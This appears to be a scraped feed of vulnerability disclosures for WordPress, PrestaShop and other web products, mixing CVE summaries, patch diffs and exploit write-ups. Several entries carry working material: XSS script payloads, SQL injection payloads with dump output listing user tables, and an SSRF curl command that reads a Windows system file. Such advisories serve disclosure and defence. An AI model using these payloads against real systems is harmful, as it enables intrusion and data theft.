The DW Question & Answer plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.5.8. This is due to missing or incorrect nonce validation on the update_answer() function. This makes it possible for unauthenticated attackers to update answers to questions via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.

CVE-2021-4408: Handle.php in dw-question-answer/trunk/inc – WordPress Plugin Repository

The Forminator – Contact Form, Payment Form & Custom Form Builder plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.13.4. This is due to missing or incorrect nonce validation on the listen_for_saving_export_schedule() function. This makes it possible for unauthenticated attackers to export form submissions via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.

Timestamp:

08/25/2020 08:14:13 PM (3 years ago)

alerzhus

Message:

Version 1.13.5  

File:

  

*   forminator/trunk/library/class-export.php (1 diff)

**Legend:**

Unmodified

Added

Removed

*   **forminator/trunk/library/class-export.php**
    
    r2271488
    
    r2368977
    
     
    
    156
    
    156
    
            if ( isset( $post\_data\['action'\] ) && 'forminator\_export\_entries' === $post\_data\['action'\] ) {
    
    157
    
    157
    
    158
    
     
    
                if ( isset( $\_POST\['\_forminator\_nonce'\] ) && ! wp\_verify\_nonce( $\_POST\['\_forminator\_nonce'\], 'forminator\_export' ) ) {
    
     
    
    158
    
                if ( ! isset( $\_POST\['\_forminator\_nonce'\] ) || ! wp\_verify\_nonce( $\_POST\['\_forminator\_nonce'\], 'forminator\_export' ) ) {
    
     
    
    159
    
    159
    
    160
    
                    $redirect = add\_query\_arg(
    
    160
    
    161
    
                        array(
    

**Note:** See TracChangeset for help on using the changeset viewer.

CVE-2021-4417: Changeset 2368977 for forminator/trunk/library/class-export.php – WordPress Plugin Repository

SQL injection vulnerability found in PrestaShop vivawallet v.1.7.10 and before allows a remote attacker to gain privileges via the vivawallet() module.

**Commit**

Permalink

Browse files

Browse the repository at this point in the history

Remove Old Prestashop Smart checkout

*   Loading branch information

Showing **53 changed files** with **0 additions** and **2,543 deletions**.

*   *   *   access.png
        *   config.xml
        *   dollar.gif
        *   fail.php
        *   install.sql
        *   logo.gif
        *   ok.gif
        *   pay.php
        *   payment.php
        *   payment.tpl
        *   payment\_eu.tpl
        *   payment\_execution.tpl
        *   payment\_noinstall.tpl
        *   payment\_noinstall\_eu.tpl
        *   payment\_return.tpl
        *   readme.txt
        *   reset\_eu.gif
        *   success.php
        *   *   index.php
        *   vivawallet.gif
        *   vivawallet.php
        *   vivawallet.tpl
        *   vivawallet\_eu.gif
        *   webhook.php
    *   *   *   access.png
            *   config.xml
            *   *   *   fail.php
                    *   index.php
                    *   pay.php
                    *   success.php
                    *   webhook.php
                *   index.php
            *   dollar.gif
            *   install.sql
            *   logo.gif
            *   logos.png
            *   ok.gif
            *   payment.php
            *   payment.tpl
            *   payment\_eu.tpl
            *   payment\_execution.tpl
            *   payment\_noinstall.tpl
            *   payment\_noinstall\_eu.tpl
            *   payment\_return.tpl
            *   readme.txt
            *   reset\_eu.gif
            *   *   index.php
                *   it.php
            *   vivawallet.gif
            *   vivawallet.php
            *   vivawallet.tpl
            *   vivawallet\_eu.gif
        *   vivawallet1.7.zip

12 changes: 0 additions & 12 deletions Plugins/prestashop/prestashop1.5-1.6/vivawallet/config.xml

66 changes: 0 additions & 66 deletions Plugins/prestashop/prestashop1.5-1.6/vivawallet/fail.php

15 changes: 0 additions & 15 deletions Plugins/prestashop/prestashop1.5-1.6/vivawallet/install.sql

29 changes: 0 additions & 29 deletions Plugins/prestashop/prestashop1.5-1.6/vivawallet/pay.php

19 changes: 0 additions & 19 deletions Plugins/prestashop/prestashop1.5-1.6/vivawallet/payment.php

12 changes: 0 additions & 12 deletions Plugins/prestashop/prestashop1.5-1.6/vivawallet/payment.tpl

3 changes: 0 additions & 3 deletions Plugins/prestashop/prestashop1.5-1.6/vivawallet/payment\_eu.tpl

31 changes: 0 additions & 31 deletions Plugins/prestashop/prestashop1.5-1.6/vivawallet/payment\_execution.tpl

18 changes: 0 additions & 18 deletions Plugins/prestashop/prestashop1.5-1.6/vivawallet/payment\_noinstall.tpl

3 changes: 0 additions & 3 deletions Plugins/prestashop/prestashop1.5-1.6/vivawallet/payment\_noinstall\_eu.tpl

9 changes: 0 additions & 9 deletions Plugins/prestashop/prestashop1.5-1.6/vivawallet/payment\_return.tpl

1 change: 0 additions & 1 deletion Plugins/prestashop/prestashop1.5-1.6/vivawallet/readme.txt

77 changes: 0 additions & 77 deletions Plugins/prestashop/prestashop1.5-1.6/vivawallet/success.php

35 changes: 0 additions & 35 deletions Plugins/prestashop/prestashop1.5-1.6/vivawallet/translations/index.php

**0 comments on commit c116968**

Please sign in to comment.

CVE-2023-26861: Remove Old Prestashop Smart checkout · VivaPayments/API@c116968

A vulnerability classified as critical has been found in Nesote Inout Blockchain FiatExchanger 3.0. This affects an unknown part of the file /index.php/coins/update_marketboxslider of the component POST Parameter Handler. The manipulation of the argument marketcurrency leads to sql injection. It is possible to initiate the attack remotely. The identifier VDB-233577 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

CVE-2023-3624

A vulnerability was found in SourceCodester AC Repair and Services System 1.0 and classified as critical. This issue affects some unknown processing of the file Master.php?f=save_service of the component HTTP POST Request Handler. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The identifier VDB-233573 was assigned to this vulnerability.

CVE-2023-3619

Ekushey Project Manager CRM version 5.0 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Ekushey Project Manager CRM 5.0 - Stored XSS# Exploit Author: CraCkEr# Vendor: Creativeitem# Vendor Homepage: https://creativeitem.com/# Software Link: https://demo.creativeitem.com/ekushey/# Tested on: Windows 10 Pro# Impact: Manipulate the content of the site ## DescriptionAllow Attacker to inject malicious code into website, give ability to steal sensitiveinformation, manipulate data, and launch additional attacks.Path: /ekushey/index.php/client/message/message_read/xxxxxxxx[random-msg-hash]POST parameter 'message' is vulnerable to XSS-----------------------------------------------POST /ekushey/index.php/client/message/send_reply/8c8936d3 HTTP/2-----------------------------------------------Content-Disposition: form-data; name="message"<script>alert(1)</script>-----------------------------------------------## Steps to Reproduce:1. Login as (Client)2. Go to [Message] on this Path: https://website/ekushey/index.php/client/message3. Select any Person to MSG (Clients or ADMINS]4. Inject your XSS Payload in [Replay Message]5. Send6. XSS Fired on Local Browser7. When ADMIN visit [Dashboard] or any section in Administration Panel on this Path : https://website/ekushey/index.php/admin/dashboard8. XSS Will Fire and Executed on his Browser[-] Done

Ekushey Project Manager CRM 5.0 Cross Site Scripting

Super Store Finder version 3.6 suffers from a remote SQL injection vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://codecanyon.net/item/super-store-finder/3630922                     ││  Vendor   : Super Store Finder                                                         ││  Software : Super Store Finder 3.6                                                     ││  Vuln Type: SQL Injection                                                              ││  Impact   : Database Access                                                            ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│ Release Notes:                                                                         ││ ═════════════                                                                          ││                                                                                        ││ SQL injection attacks can allow unauthorized access to sensitive data, modification of ││ data and crash the application or make it unavailable, leading to lost revenue and     ││ damage to a company's reputation.                                                      ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL, MoizSid09, indoushka            CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /index.php---------------------------------------------------------------------------------POST /products/superstorefinder/index.php HTTP/1.1ajax=1&action=get_nearby_stores&distance=200&lat=40.7127753&lng=-74.0059728&products=347[SQLI]---------------------------------------------------------------------------------POST parameter 'products' is vulnerable to SQL Injection---Parameter: products (POST)    Type: error-based    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)    Payload: ajax=1&action=get_nearby_stores&distance=200&lat=40.7127753&lng=-74.0059728&products=347' AND GTID_SUBSET(CONCAT_WS(0x28,0x496e6a65637465647e,0x72306f746833783439,0x7e454e44),1337)-- wXyW    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: ajax=1&action=get_nearby_stores&distance=200&lat=40.7127753&lng=-74.0059728&products=347' AND 04872=4872-- wXyW    Type: time-based blind    Title: MySQL >= 5.0.12 time-based blind (IF - comment)    Payload: ajax=1&action=get_nearby_stores&distance=200&lat=40.7127753&lng=-74.0059728&products=347'XOR(IF(now()=sysdate(),SLEEP(6),0))XOR'Z---[+] Starting the Attackfetching current databasecurrent database: 'superstor_***'fetching tables[8 tables]+--------------+| categories_b || categories   || stores_c     || categories_c || stores_b     || users_b      || users        || stores       |+--------------+fetching columns for table 'users'[11 columns]+-------------+| id          || username    || password    || firstname   || lastname    || facebook_id || address     || email       || created     || modified    || status      |+-------------+[-] Done

Super Store Finder 3.6 SQL Injection

Ateme TITAN File version 3.9 suffers from a server-side request forgery vulnerability that allows for file enumeration.

  
Ateme TITAN File 3.9 Job Callbacks SSRF File Enumeration

Vendor: Ateme  
Product web page: https://www.ateme.com  
Affected version: 3.9.12.4  
                  3.9.11.0  
                  3.9.9.2  
                  3.9.8.0

Summary: TITAN File is a multi-codec/format video transcoding  
software, for mezzanine, STB and ABR VOD, PostProduction, Playout  
and Archive applications. TITAN File is based on ATEME 5th Generation  
STREAM compression engine and delivers the highest video quality  
at minimum bitrates with accelerated parallel processing.

Desc: Authenticated Server-Side Request Forgery (SSRF) vulnerability  
exists in the Titan File video transcoding software. The application  
parses user supplied data in the job callback url GET parameter. Since  
no validation is carried out on the parameter, an attacker can specify  
an external domain and force the application to make an HTTP/DNS/File  
request to an arbitrary destination. This can be used by an external  
attacker for example to bypass firewalls and initiate a service, file  
and network enumeration on the internal network through the affected  
application.

Tested on: Microsoft Windows  
           NodeJS  
           Ateme KFE Software

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
                            @zeroscience

Advisory ID: ZSL-2023-5781  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5781.php

22.04.2023

--

curl -vk -H "X-TITAN-WEB-HASTOKEN: true" \  
         -H "X-TITAN-WEB-TOKEN: 54E83A8B-E9E9-9C87-886A-12CB091AB251" \  
         -H "User-Agent: sunee-mode" \  
         "https://10.0.0.8/cmd?data=<callback_test><url><!\[CDATA\[file://c:\\\\windows\\\\system.ini\]\]></url><state><!\[CDATA\[encoding\]\]></state></callback_test>"

Call to file://C:\\windows\\system.ini returned 0

---

HTTP from Server  
----------------

POST / HTTP/1.1  
Host: ssrftest.zeroscience.mk  
Accept: */*  
Content-Type: application/xml  
Content-Length: 192

<?xml version='1.0' encoding='UTF-8' ?>  
<update>  
   <id>0000</id>  
   <name>dummy test job</name>  
   <status>aborted</status>  
   <progress>50</progress>  
   <message>message</message>  
</update>

Ateme TITAN File 3.9 Job Callbacks Server-Side Request Forgery

TwoNav v2.0.28-20230624 is vulnerable to Cross Site Scripting (XSS).

Vulnerability Product:TwoNav v2.0.28-20230624  
Vulnerability version: v2.0.28-20230624  
Vulnerability type: Stored XSS  
Vulnerability Details:  
Vulnerability location:add header 、"/index.php?c=api&method=read\_data&type=phpinfo&u=admin"

The default settings allowing free register, causes stored XSS  
the Stored XSS payload could let admin call phpinfo(); and bypassing the http-only , causes disclosure of cookies、root path of websites、variables of PHP and stuff

firstly , register an account at http://localhost/?c=login,  
account : test  
password : test  

then go to "站点设置",  
because of the http-only, you need to let admin call phpinfo(), the api is this : http://localhost/index.php?c=api&method=read\_data&type=phpinfo&u=admin  
enter the payload at the input of "头部(header)代码 - 用户", :

payload:

<script src\="http://cdn.bootcss.com/jquery/1.11.0/jquery.min.js" type\="text/javascript"\></script\>
<script\>
$.ajax({
                url: '/index.php?c=api&method=read\_data&type=phpinfo&u=admin',
                type: 'get',
                success: function (data) {
                    console.log(data);
                }
            })
</script>

and click "保存"  

after it , when an admin enter the page "http://localhost/?u=test", the page will automatically get phpinfo and call console.log() print it  
(Certainly you can update the payload to send phpinfo to your server, console log is a test)  
  
finally ,we download phpinfo and open it in html ,  
here is large number of cookies was disclosed, and root path of website  
  

proved Stored XSS

discovered by leeya\_bug

CVE-2023-37657: [Warning] Stored XSS in TwoNav v2.0.28-20230624 · Issue #3 · tznb1/TwoNav

SQL injection vulnerability in wmanager v.1.0.7 and before allows a remote attacker to obtain sensitive information via a crafted script to the company.php component.

**  
Free and Open source CRM, process manager  
and development framework**

WManager is a free and open source web application aimed to support companies business process automation.  
WManager includes a fully featured "**process manager**" which can work with little configuration efforts plus a very scalable **development framewotk.** You can i**mport extensions from third parties** (either free or charged), create **local (custom) extensions** and/or **develop new extensions** to be published in the community repository. WManager is based on the simple PHP/Postgres stack. It uses a standard and readable SQL database structure and carries a well designed "general purpose" business data model that you can extend and customize according to your needs, plus a nice frontend template.

WManager Demo

user: admin@admin.com pw: password

Tag

#php